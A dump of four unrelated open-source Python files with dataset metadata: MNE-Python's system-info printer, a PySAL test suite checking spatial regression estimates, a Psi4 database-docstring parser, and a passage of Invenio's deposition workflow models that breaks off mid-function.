Python: 3.8.1 (default, Feb 2 2020, 08:37:37) [GCC 8.3.0]
Executable: /usr/local/bin/python
CPU: : 36 cores
Memory: 68.7 GB
mne: 0.21.dev0
numpy: 1.19.0 {blas=openblas, lapack=openblas}
scipy: 1.5.1
matplotlib: 3.2.2 {backend=Qt5Agg}
sklearn: 0.23.1
numba: 0.50.1
nibabel: 3.1.1
nilearn: 0.7.0
dipy: 1.1.1
cupy: Not found
pandas: 1.0.5
mayavi: Not found
pyvista: 0.25.3 {pyvistaqt=0.1.1, OpenGL 3.3 (Core Profile) Mesa 18.3.6 via llvmpipe (LLVM 7.0, 256 bits)}
vtk: 9.0.1
PyQt5: 5.15.0
pooch: v1.5.1
""" # noqa: E501
_validate_type(dependencies, str)
_check_option('dependencies', dependencies, ('user', 'developer'))
ljust = 21 if dependencies == 'developer' else 15
platform_str = platform.platform()
if platform.system() == 'Darwin' and sys.version_info[:2] < (3, 8):
# platform.platform() in Python < 3.8 doesn't call
# platform.mac_ver() if we're on Darwin, so we don't get a nice macOS
# version number. Therefore, let's do this manually here.
macos_ver = platform.mac_ver()[0]
macos_architecture = re.findall('Darwin-.*?-(.*)', platform_str)
if macos_architecture:
macos_architecture = macos_architecture[0]
platform_str = f'macOS-{macos_ver}-{macos_architecture}'
del macos_ver, macos_architecture
out = 'Platform:'.ljust(ljust) + platform_str + '\n'
out += 'Python:'.ljust(ljust) + str(sys.version).replace('\n', ' ') + '\n'
out += 'Executable:'.ljust(ljust) + sys.executable + '\n'
out += 'CPU:'.ljust(ljust) + ('%s: ' % platform.processor())
try:
import multiprocessing
except ImportError:
out += ('number of processors unavailable ' +
'(requires "multiprocessing" package)\n')
else:
out += '%s cores\n' % multiprocessing.cpu_count()
out += 'Memory:'.ljust(ljust)
try:
import psutil
except ImportError:
out += 'Unavailable (requires "psutil" package)'
else:
out += '%0.1f GB\n' % (psutil.virtual_memory().total / float(2 ** 30),)
out += '\n'
libs = _get_numpy_libs()
use_mod_names = ('mne', 'numpy', 'scipy', 'matplotlib', '', 'sklearn',
'numba', 'nibabel', 'nilearn', 'dipy', 'cupy', 'pandas',
'mayavi', 'pyvista', 'pyvistaqt', 'ipyvtklink', 'vtk',
'PyQt5', 'ipympl')
if dependencies == 'developer':
use_mod_names += (
'', 'sphinx', 'sphinx_gallery', 'numpydoc', 'pydata_sphinx_theme',
'mne_bids', 'pytest', 'nbclient')
for mod_name in use_mod_names:
if mod_name == '':
out += '\n'
continue
out += ('%s:' % mod_name).ljust(ljust)
try:
mod = __import__(mod_name)
if mod_name == 'mayavi':
# the real test
from mayavi import mlab # noqa, analysis:ignore
except Exception:
out += 'Not found\n'
else:
extra = ''
if mod_name == 'numpy':
extra += ' {%s}%s' % (libs, extra)
elif mod_name == 'matplotlib':
extra += ' {backend=%s}%s' % (mod.get_backend(), extra)
elif mod_name == 'pyvista':
try:
from pyvista import GPUInfo
except ImportError:
pass
else:
gi = GPUInfo()
extra += f' {{OpenGL {gi.version} via {gi.renderer}}}'
if mod_name == 'vtk':
version = mod.vtkVersion()
# 9.0 dev has VersionFull but 9.0 doesn't
for attr in ('GetVTKVersionFull', 'GetVTKVersion'):
if hasattr(version, attr):
version = getattr(version, attr)()
break
elif mod_name == 'PyQt5':
version = _check_pyqt5_version()
else:
version = mod.__version__
if show_paths:
extra += f'\n{" " * ljust}•{op.dirname(mod.__file__)}'
out += '%s%s\n' % (version, extra)
print(out, end='', file=fid)
|
bloyl/mne-python
|
mne/utils/config.py
|
Python
|
bsd-3-clause
| 20,862
|
[
"Mayavi",
"VTK"
] |
a60932d1fd722311baf7472bafba3fe5d7feeb6029d765e1f3eb23344e3b62bb
|
import unittest
import pysal
import numpy as np
from scipy import sparse
#from pysal.spreg import error_sp_het as HET
from functools import partial
from pysal.contrib.handler import Model
GM_Error_Het = partial(Model, mtype='GM_Error_Het')
GM_Endog_Error_Het = partial(Model, mtype='GM_Endog_Error_Het')
GM_Combo_Het = partial(Model, mtype='GM_Combo_Het')
class TestGMErrorHet(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Error_Het(self.y, self.X, self.w, step1c=True)
betas = np.array([[ 47.99626638], [ 0.71048989], [ -0.55876126], [ 0.41178776]])
np.testing.assert_array_almost_equal(reg.betas,betas,7)
u = np.array([ 27.38122697])
np.testing.assert_array_almost_equal(reg.u[0],u,7)
ef = np.array([ 32.29765975])
np.testing.assert_array_almost_equal(reg.e_filtered[0],ef,7)
predy = np.array([ 53.08577603])
np.testing.assert_array_almost_equal(reg.predy[0],predy,7)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 3
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,7)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x[0].toarray()[0],x,7)
i_s = 'Maximum number of iterations reached.'
np.testing.assert_string_equal(reg.iter_stop,i_s)
its = 1
self.assertAlmostEqual(reg.iteration,its,7)
my = 38.436224469387746
self.assertAlmostEqual(reg.mean_y,my)
stdy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,stdy)
vm = np.array([[ 1.31767529e+02, -3.58368748e+00, -1.65090647e+00,
0.00000000e+00],
[ -3.58368748e+00, 1.35513711e-01, 3.77539055e-02,
0.00000000e+00],
[ -1.65090647e+00, 3.77539055e-02, 2.61042702e-02,
0.00000000e+00],
[ 0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
2.82398517e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
pr2 = 0.34951013222581306
self.assertAlmostEqual(reg.pr2,pr2)
stde = np.array([ 11.47900385, 0.36812187, 0.16156816, 0.16804717])
np.testing.assert_array_almost_equal(reg.std_err,stde,4)
z_stat = np.array([[ 4.18122226e+00, 2.89946274e-05],
[ 1.93003988e+00, 5.36018970e-02],
[ -3.45836247e+00, 5.43469673e-04],
[ 2.45042960e+00, 1.42685863e-02]])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,4)
xtx = np.array([[ 4.90000000e+01, 7.04371999e+02, 1.72131237e+03],
[ 7.04371999e+02, 1.16866734e+04, 2.15575320e+04],
[ 1.72131237e+03, 2.15575320e+04, 7.39058986e+04]])
np.testing.assert_array_almost_equal(reg.xtx,xtx,4)
class TestGMEndogErrorHet(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
yd = []
yd.append(db.by_col("CRIME"))
self.yd = np.array(yd).T
q = []
q.append(db.by_col("DISCBD"))
self.q = np.array(q).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
reg = GM_Endog_Error_Het(self.y, self.X, self.yd, self.q, self.w, step1c=True)
betas = np.array([[ 55.39707924], [ 0.46563046], [ -0.67038326], [ 0.41135023]])
np.testing.assert_array_almost_equal(reg.betas,betas,7)
u = np.array([ 26.51812895])
np.testing.assert_array_almost_equal(reg.u[0],u,7)
predy = np.array([ 53.94887405])
np.testing.assert_array_almost_equal(reg.predy[0],predy,7)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 3
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,7)
x = np.array([ 1. , 19.531])
np.testing.assert_array_almost_equal(reg.x[0].toarray()[0],x,7)
yend = np.array([ 15.72598])
np.testing.assert_array_almost_equal(reg.yend[0],yend,7)
q = np.array([ 5.03])
np.testing.assert_array_almost_equal(reg.q[0],q,7)
z = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.z[0].toarray()[0],z,7)
h = np.array([ 1. , 19.531, 5.03 ])
np.testing.assert_array_almost_equal(reg.h[0].toarray()[0],h,7)
i_s = 'Maximum number of iterations reached.'
np.testing.assert_string_equal(reg.iter_stop,i_s)
its = 1
self.assertAlmostEqual(reg.iteration,its,7)
my = 38.436224469387746
self.assertAlmostEqual(reg.mean_y,my)
stdy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,stdy)
vm = np.array([[ 8.34637805e+02, -2.16932259e+01, -1.33327894e+01,
1.65840848e+00],
[ -2.16932259e+01, 5.97683070e-01, 3.39503523e-01,
-3.90111107e-02],
[ -1.33327894e+01, 3.39503523e-01, 2.19008080e-01,
-2.81929695e-02],
[ 1.65840848e+00, -3.90111107e-02, -2.81929695e-02,
3.15686105e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
pr2 = 0.34648011338954804
self.assertAlmostEqual(reg.pr2,pr2,7)
std_err = np.array([ 28.89009873, 0.77309965, 0.46798299,
0.17767558])
np.testing.assert_array_almost_equal(reg.std_err,std_err,6)
z_stat = np.array([(1.9175109006819244, 0.055173057472126787), (0.60229035155742305, 0.54698088217644414), (-1.4324949211864271, 0.15200223057569454), (2.3151759776869496, 0.020603303355572443)])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,6)
hth = np.array([[ 49. , 704.371999 , 139.75 ],
[ 704.371999 , 11686.67338121, 2246.12800625],
[ 139.75 , 2246.12800625, 498.5851 ]])
np.testing.assert_array_almost_equal(reg.hth,hth,6)
class TestGMComboHet(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
# Only spatial lag
reg = GM_Combo_Het(self.y, self.X, w=self.w, step1c=True)
betas = np.array([[ 57.7778574 ], [ 0.73034922], [ -0.59257362], [ -0.2230231 ], [ 0.56636724]])
np.testing.assert_array_almost_equal(reg.betas,betas,7)
u = np.array([ 25.65156033])
np.testing.assert_array_almost_equal(reg.u[0],u,7)
ef = np.array([ 31.87664403])
np.testing.assert_array_almost_equal(reg.e_filtered[0],ef,7)
ep = np.array([ 28.30648145])
np.testing.assert_array_almost_equal(reg.e_pred[0],ep,7)
pe = np.array([ 52.16052155])
np.testing.assert_array_almost_equal(reg.predy_e[0],pe,7)
predy = np.array([ 54.81544267])
np.testing.assert_array_almost_equal(reg.predy[0],predy,7)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 4
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,7)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x[0].toarray()[0],x,7)
yend = np.array([ 35.4585005])
np.testing.assert_array_almost_equal(reg.yend[0],yend,7)
q = np.array([ 18.594 , 24.7142675])
np.testing.assert_array_almost_equal(reg.q[0].toarray()[0],q,7)
z = np.array([ 1. , 19.531 , 15.72598 , 35.4585005])
np.testing.assert_array_almost_equal(reg.z[0].toarray()[0],z,7)
i_s = 'Maximum number of iterations reached.'
np.testing.assert_string_equal(reg.iter_stop,i_s)
its = 1
self.assertAlmostEqual(reg.iteration,its,7)
my = 38.436224469387746
self.assertAlmostEqual(reg.mean_y,my)
stdy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,stdy)
vm = np.array([[ 4.86218274e+02, -2.77268729e+00, -1.59987770e+00,
-1.01969471e+01, 2.74302006e+00],
[ -2.77268729e+00, 1.04680972e-01, 2.51172238e-02,
1.95136385e-03, 3.70052723e-03],
[ -1.59987770e+00, 2.51172238e-02, 2.15655720e-02,
7.65868344e-03, -7.30173070e-03],
[ -1.01969471e+01, 1.95136385e-03, 7.65868344e-03,
2.78273684e-01, -6.89402590e-02],
[ 2.74302006e+00, 3.70052723e-03, -7.30173070e-03,
-6.89402590e-02, 7.12034037e-02]])
np.testing.assert_array_almost_equal(reg.vm,vm,6)
pr2 = 0.3001582877472412
self.assertAlmostEqual(reg.pr2,pr2,7)
pr2_e = 0.35613102283621967
self.assertAlmostEqual(reg.pr2_e,pr2_e,7)
std_err = np.array([ 22.05035768, 0.32354439, 0.14685221, 0.52751653, 0.26683966])
np.testing.assert_array_almost_equal(reg.std_err,std_err,6)
z_stat = np.array([(2.6202684885795335, 0.00878605635338265), (2.2573385444145524, 0.023986928627746887), (-4.0351698589183433, 5.456281036278686e-05), (-0.42277935292121521, 0.67245625315942159), (2.1225002455741895, 0.033795752094112265)])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,6)
hth = np.array([[ 4.90000000e+01, 7.04371999e+02, 1.72131237e+03,
7.24743592e+02, 1.70735413e+03],
[ 7.04371999e+02, 1.16866734e+04, 2.15575320e+04,
1.10925200e+04, 2.23848036e+04],
[ 1.72131237e+03, 2.15575320e+04, 7.39058986e+04,
2.34796298e+04, 6.70145378e+04],
[ 7.24743592e+02, 1.10925200e+04, 2.34796298e+04,
1.16146226e+04, 2.30304624e+04],
[ 1.70735413e+03, 2.23848036e+04, 6.70145378e+04,
2.30304624e+04, 6.69879858e+04]])
np.testing.assert_array_almost_equal(reg.hth,hth,4)
if __name__ == '__main__':
unittest.main()
|
TaylorOshan/pysal
|
pysal/contrib/handler/tests/test_error_spet_sparse.py
|
Python
|
bsd-3-clause
| 11,099
|
[
"COLUMBUS"
] |
3e2419d78dbb905d6516ea1cd9d1b14720b3504daceb06a80fdf91cc9248d90c
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
r"""File to
"""
import sys
import os
import glob
import ast
def useful():
print("in qcdb.useful()")
return 'qcdb successfully accessed'
def drop_duplicates(seq):
"""Function that given an array or array of arrays *seq*, returns an
array without any duplicate entries. There is no guarantee of which
duplicate entry is dropped.
"""
noDupes = []
seq2 = sum(seq, [])
[noDupes.append(i) for i in seq2 if not noDupes.count(i)]
return noDupes
def dictify_database_docstrings():
"""
"""
db_path = os.path.dirname(__file__) + '/../databases'
DSD = {}
module_choices = []
for module in glob.glob(db_path + '/*.py'):
filename = os.path.split(module)[1]
basename = os.path.splitext(filename)[0]
div = '=' * len(basename)
module_choices.append(basename)
DSD[basename] = {}
M = ast.parse(''.join(open(module)))
DS = ast.get_docstring(M)
if not DS:
DS = ""
DS = str.replace(DS, '|dl|', '-->')
DS = str.replace(DS, '|dr|', '<--')
DS = str.replace(DS, "``'", '')
DS = str.replace(DS, "'``", '')
lst = DS.split("\n- **")
#DSD[basename]['general'] = str.replace(lst[0], '|', '')
DSD[basename]['general'] = lst[0].split('\n')
try:
DSD[basename]['cp'] = [section for section in lst if section.startswith("cp")][0]
except IndexError:
DSD[basename]['cp'] = None
try:
DSD[basename]['rlxd'] = [section for section in lst if section.startswith("rlxd")][0]
except IndexError:
DSD[basename]['rlxd'] = None
try:
DSD[basename]['benchmark'] = [section for section in lst if section.startswith("benchmark")][0]
except IndexError:
DSD[basename]['benchmark'] = None
try:
#DSD[basename]['subset'] = [section for section in lst if section.startswith("subset")][0]
temp = [section for section in lst if section.startswith("subset")][0].splitlines()
temp = temp[2:]
result = {}
for item in temp:
item = item.lstrip(" -")
try:
key, val = item.split(" ", 1)
result[key] = val
except ValueError:
result[item] = ""
DSD[basename]['subset'] = result
except IndexError:
DSD[basename]['subset'] = {"": 'No subsets available'}
return DSD
# print '\ngeneral\n\n', DSD[basename]['general']
# print '\ncp\n\n', DSD[basename]['cp']
# print '\nrlxd\n\n', DSD[basename]['rlxd']
# print '\nbenchmark\n\n', DSD[basename]['benchmark']
# print '\nsubset\n\n', DSD[basename]['subset']
#print ' %-12s %s' % ('[' + basename + ']', DSD[basename]['general'][0])
#print 'DSD2\n', DSD['S22']['subset']
|
ashutoshvt/psi4
|
psi4/driver/qcdb/dbproc.py
|
Python
|
lgpl-3.0
| 3,856
|
[
"Psi4"
] |
cacfd102d9c2a3e5610df5b28ea682495765f62cef497d2029555140c244470a
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Deposition data model classes.
Classes for wrapping BibWorkflowObject and friends to make it easier to
work with the data attributes.
"""
from uuid import uuid4
import json
import os
from datetime import datetime
from dateutil.tz import tzutc
from sqlalchemy.orm.exc import NoResultFound
from werkzeug.datastructures import MultiDict
from werkzeug.utils import secure_filename
from flask import redirect, render_template, flash, url_for, request, \
session, current_app
from flask.ext.login import current_user
from flask.ext.restful import fields, marshal
from invenio.ext.restful import UTCISODateTime
from invenio.base.helpers import unicodifier
from invenio.ext.sqlalchemy import db
from invenio.modules.workflows.models import BibWorkflowObject, Workflow, \
ObjectVersion
from invenio.modules.workflows.engine import WorkflowStatus
from .form import CFG_FIELD_FLAGS, DataExporter
from .signals import file_uploaded
from .storage import Storage, DepositionStorage
#
# Exceptions
#
class DepositionError(Exception):
"""Base class for deposition errors."""
pass
class InvalidDepositionType(DepositionError):
"""Raise when a deposition type cannot be found."""
pass
class InvalidDepositionAction(DepositionError):
"""Raise when deposition is in an invalid state for action."""
pass
class DepositionDoesNotExists(DepositionError):
"""Raise when a deposition does not exists."""
pass
class DraftDoesNotExists(DepositionError):
"""Raise when a draft does not exists."""
pass
class FormDoesNotExists(DepositionError):
"""Raise when a draft does not exists."""
pass
class FileDoesNotExists(DepositionError):
"""Raise when a draft does not exists."""
pass
class DepositionNotDeletable(DepositionError):
"""Raise when a deposition cannot be deleted."""
pass
class FilenameAlreadyExists(DepositionError):
"""Raise when an identical filename is already present in a deposition."""
pass
class ForbiddenAction(DepositionError):
"""Raise when action on a deposition, draft or file is not authorized."""
pass
class InvalidApiAction(DepositionError):
"""Raise when an invalid API action is requested."""
pass
#
# Helpers
#
class FactoryMixin(object):
"""Mix-in class to help create objects from persisted object state."""
@classmethod
def factory(cls, state, *args, **kwargs):
obj = cls(*args, **kwargs)
obj.__setstate__(state)
return obj
#
# Primary classes
#
class DepositionType(object):
"""
A base class for the deposition types to ensure certain
properties are defined on each type.
A deposition type is just a BibWorkflow with a couple of extra methods.
To customize rendering behavior of the workflow for a given deposition type
you can override the render_error(), render_step() and render_completed()
methods.
"""
workflow = []
""" Workflow definition """
name = ""
""" Display name for this deposition type """
name_plural = ""
""" Plural version of display name for this deposition type """
enabled = False
""" Determines if type is enabled - TODO: REMOVE"""
default = False
"""
Determines if type is the default - warnings are issed if conflicts exsists
TODO: remove
"""
deletable = False
"""
Determine if a deposition is deletable after submission.
"""
editable = False
"""
Determine if a deposition is editable after submission.
"""
stopable = False
"""
Determine if a deposition workflow can be stopped (i.e. discard changes).
"""
group = None
""" Name of group to include this type in. """
api = False
"""
Determines if API is enabled for this type (requires workflow to be
compatible with the API).
"""
draft_definitions = {'_default': None}
"""
Dictionary of all drafts for this deposition type
"""
marshal_file_fields = dict(
checksum=fields.String,
filename=fields.String(attribute='name'),
id=fields.String(attribute='uuid'),
filesize=fields.String(attribute='size'),
)
""" REST API structure of a file """
marshal_draft_fields = dict(
metadata=fields.Raw(attribute='values'),
completed=fields.Boolean,
id=fields.String,
)
""" REST API structure of a draft """
marshal_deposition_fields = dict(
id=fields.Integer,
title=fields.String,
created=UTCISODateTime,
modified=UTCISODateTime,
owner=fields.Integer(attribute='user_id'),
state=fields.String,
submitted=fields.Boolean,
files=fields.Nested(marshal_file_fields),
drafts=fields.Nested(marshal_draft_fields, attribute='drafts_list'),
)
""" REST API structure of a deposition """
@classmethod
def default_draft_id(cls, deposition):
return '_default'
@classmethod
def render_error(cls, dummy_deposition):
"""
Render a page when deposition had an workflow error.
Method can be overwritten by subclasses to provide custom
user interface.
"""
flash('%(name)s deposition has returned error.' %
{'name': cls.name}, 'error')
return redirect(url_for('.index'))
@classmethod
def render_step(self, deposition):
"""
Render a page for a given deposition step.
Method can be overwritten by subclasses to provide custom
user interface.
"""
ctx = deposition.get_render_context()
if ctx:
return render_template(**ctx)
else:
return render_template('deposit/error.html', **dict(
depostion=deposition,
deposition_type=(
None if deposition.type.is_default()
else deposition.type.get_identifier()
),
uuid=deposition.id,
my_depositions=Deposition.get_depositions(
current_user, type=deposition.type
),
))
@classmethod
def render_completed(cls, dummy_deposition):
"""
Render page when deposition was successfully completed (i.e workflow
just finished successfully).
Method can be overwritten by subclasses to provide custom
user interface.
"""
flash('%(name)s was successfully finished.' %
{'name': cls.name}, 'success')
return redirect(url_for('.index'))
@classmethod
def render_final(cls, deposition):
"""
Render page when deposition was *already* successfully completed (i.e
a finished workflow is being executed a second time).
This allows you render e.g. a preview of the record. The distinction
between render_completed and render_final is primarily useful for the
REST API (see api_final and api_completed)
Method can be overwritten by subclasses to provide custom
user interface.
"""
return cls.render_completed(deposition)
@classmethod
def api_completed(cls, deposition):
"""
Workflow just finished processing so return an 202 Accepted, since
usually further background processing may happen.
"""
return deposition.marshal(), 202
@classmethod
def api_final(cls, deposition):
"""
Workflow already finished, and the user tries to re-execute the
workflow, so send a 400 Bad Request back.
"""
return dict(
message="Deposition workflow already completed",
status=400,
), 400
@classmethod
def api_step(cls, deposition):
"""
Workflow was halted during processing. The workflow task that halted
processing is expected to provide a response to send back to the
client.
The default response code is 500 Internal Server Error. A workflow task
is expected to use Deposition.set_render_context() with a dictionary
which is returned to the client. Set the key 'status', to change the
status code, e.g.::
d.set_render_context(dict(status=400, message="Bad request"))
If no response is provided by the workflow task, it is regarded as
an internal server error.
"""
ctx = deposition.get_render_context()
if ctx:
return ctx.get('response', {}), ctx.get('status', 500)
return cls.api_error(deposition)
@classmethod
def api_error(cls, deposition):
return dict(message='Internal Server Error', status=500), 500
@classmethod
def api_action(cls, deposition, action_id):
if action_id == 'run':
return deposition.run_workflow(headless=True)
elif action_id == 'reinitialize':
deposition.reinitialize_workflow()
return deposition.run_workflow(headless=True)
elif action_id == 'stop':
deposition.stop_workflow()
return deposition.run_workflow(headless=True)
raise InvalidApiAction(action_id)
@classmethod
def api_metadata_schema(cls, draft_id):
"""
Get the input validation schema for this draft_id
Allows you to override API defaults.
"""
from wtforms.fields.core import FieldList, FormField
if draft_id in cls.draft_definitions:
schema = dict()
formclass = cls.draft_definitions[draft_id]
for fname, fclass in formclass()._fields.items():
if isinstance(fclass, FieldList):
schema[fname] = dict(type='list')
elif isinstance(fclass, FormField):
schema[fname] = dict(type='dict')
else:
schema[fname] = dict(type='any')
return dict(type='dict', schema=schema)
return None
@classmethod
def marshal_deposition(cls, obj):
"""
Generate a JSON representation for REST API of a Deposition
"""
return marshal(obj, cls.marshal_deposition_fields)
@classmethod
def marshal_draft(cls, obj):
"""
Generate a JSON representation for REST API of a DepositionDraft
"""
return marshal(obj, cls.marshal_draft_fields)
@classmethod
def marshal_file(cls, obj):
"""
Generate a JSON representation for REST API of a DepositionFile
"""
return marshal(obj, cls.marshal_file_fields)
@classmethod
def authorize(cls, deposition, action):
if action == 'create':
return True # Any authenticated user
elif action == 'delete':
if deposition.has_sip():
return deposition.type.deletable
return True
elif action == 'reinitialize':
return deposition.type.editable
elif action == 'stop':
return deposition.type.stopable
elif action in ['add_file', 'remove_file', 'sort_files']:
# Don't allow to add/remove/sort files after first submission
return not deposition.has_sip()
elif action in ['add_draft', ]:
# Allow adding drafts when inprogress (independent of SIP exists
# or not).
return deposition.state == 'inprogress'
else:
return not deposition.has_sip()
@classmethod
def authorize_draft(cls, deposition, draft, action):
if action == 'update':
# If deposition allows adding a draft, then allow editing the
# draft.
return cls.authorize(deposition, 'add_draft')
return cls.authorize(deposition, 'add_draft')
@classmethod
def authorize_file(cls, deposition, deposition_file, action):
return cls.authorize(deposition, 'add_file')
@classmethod
def get_identifier(cls):
""" Get type identifier (identical to workflow name) """
return cls.__name__
@classmethod
def is_enabled(cls):
""" Check if workflow is enabled """
# Wrapping in a method to eventually allow enabling/disabling
# via configuration.
return cls.enabled
@classmethod
def is_default(cls):
""" Check if workflow is the default """
# Wrapping in a method to eventually allow configuration
# via configuration.
return cls.default
@classmethod
def run_workflow(cls, deposition):
"""
Run workflow for the given BibWorkflowObject.
Usually not invoked directly, but instead indirectly through
Deposition.run_workflow().
"""
if deposition.workflow_object.workflow is None or (
deposition.workflow_object.version == ObjectVersion.INITIAL
and
deposition.workflow_object.workflow.status ==
WorkflowStatus.NEW):
return deposition.workflow_object.start_workflow(
workflow_name=cls.get_identifier(),
id_user=deposition.workflow_object.id_user,
module_name="webdeposit"
)
else:
return deposition.workflow_object.continue_workflow(
start_point="restart_task",
)
@classmethod
def reinitialize_workflow(cls, deposition):
# Only reinitialize if really needed (i.e. you can only
# reinitialize a fully completed workflow).
wo = deposition.workflow_object
if wo.version == ObjectVersion.COMPLETED and \
wo.workflow.status == WorkflowStatus.COMPLETED:
wo.version = ObjectVersion.INITIAL
wo.workflow.status = WorkflowStatus.NEW
# Clear deposition drafts
deposition.drafts = {}
@classmethod
def stop_workflow(cls, deposition):
# Only stop workflow if really needed
wo = deposition.workflow_object
if wo.version != ObjectVersion.COMPLETED and \
wo.workflow.status != WorkflowStatus.COMPLETED:
# Only workflows which has been fully completed once before
# can be stopped
if deposition.has_sip():
wo.version = ObjectVersion.COMPLETED
wo.workflow.status = WorkflowStatus.COMPLETED
# Clear all drafts
deposition.drafts = {}
# Set title - FIXME: find better way to set title
sip = deposition.get_latest_sip(sealed=True)
title = sip.metadata.get('title', 'Untitled')
deposition.title = title
@classmethod
def all(cls):
""" Get a dictionary of deposition types """
from .registry import deposit_types
return deposit_types.mapping()
@classmethod
def get(cls, identifier):
try:
return cls.all()[identifier]
except KeyError:
raise InvalidDepositionType(identifier)
@classmethod
def keys(cls):
""" Get a list of deposition type names """
return cls.all().keys()
@classmethod
def values(cls):
""" Get a list of deposition type names """
return cls.all().values()
@classmethod
def get_default(cls):
""" Get a list of deposition type names """
from .registry import deposit_default_type
return deposit_default_type.get()
def __unicode__(self):
""" Return a name for this class """
return self.get_identifier()
class DepositionFile(FactoryMixin):
"""
Represents an uploaded file
Creating a normal deposition file::
uploaded_file = request.files['file']
filename = secure_filename(uploaded_file.filename)
backend = DepositionStorage(deposition_id)
d = DepositionFile(backend=backend)
d.save(uploaded_file, filename)
Creating a chunked deposition file::
uploaded_file = request.files['file']
filename = secure_filename(uploaded_file.filename)
chunk = request.files['chunk']
chunks = request.files['chunks']
backend = ChunkedDepositionStorage(deposition_id)
d = DepositionFile(id=file_id, backend=backend)
d.save(uploaded_file, filename, chunk, chunks)
if chunk == chunks:
d.save(finish=True, filename=filename)
Reading a file::
d = DepositionFile.from_json(data)
if d.is_local():
send_file(d.get_syspath())
else:
redirect(d.get_url())
d.delete()
Deleting a file::
d = DepositionFile.from_json(data)
d.delete()
"""
def __init__(self, uuid=None, backend=None):
self.uuid = uuid or str(uuid4())
self._backend = backend
self.name = ''
def __getstate__(self):
# TODO: Add content_type attributes
return dict(
id=self.uuid,
path=self.path,
name=self.name,
size=self.size,
checksum=self.checksum,
#bibdoc=self.bibdoc
)
def __setstate__(self, state):
self.uuid = state['id']
self._path = state['path']
self.name = state['name']
self.size = state['size']
self.checksum = state['checksum']
def __repr__(self):
data = self.__getstate__()
del data['path']
return json.dumps(data)
@property
def backend(self):
if not self._backend:
self._backend = Storage(None)
return self._backend
@property
def path(self):
if self._path is None:
raise Exception("No path set")
return self._path
def save(self, incoming_file, filename=None, *args, **kwargs):
self.name = secure_filename(filename or incoming_file.filename)
(self._path, self.size, self.checksum, result) = self.backend.save(
incoming_file, filename, *args, **kwargs
)
return result
def delete(self):
""" Delete the file on storage """
return self.backend.delete(self.path)
def is_local(self):
""" Determine if file is a local file """
return self.backend.is_local(self.path)
def get_url(self):
""" Get a URL for the file """
return self.backend.get_url(self.path)
def get_syspath(self):
""" Get a local system path to the file """
return self.backend.get_syspath(self.path)
class DepositionDraftCacheManager(object):
"""
Draft cache manager takes care of storing draft values in the cache prior
to a workflow being run. The data can be loaded by the prefill_draft()
workflow task.
"""
def __init__(self, user_id):
self.user_id = user_id
self.data = {}
@classmethod
def from_request(cls):
"""
Create a new draft cache from the current request.
"""
obj = cls(current_user.get_id())
# First check if we can get it via a json
data = request.get_json(silent=True)
if not data:
# If, not simply merge all both query parameters and request body
# parameters.
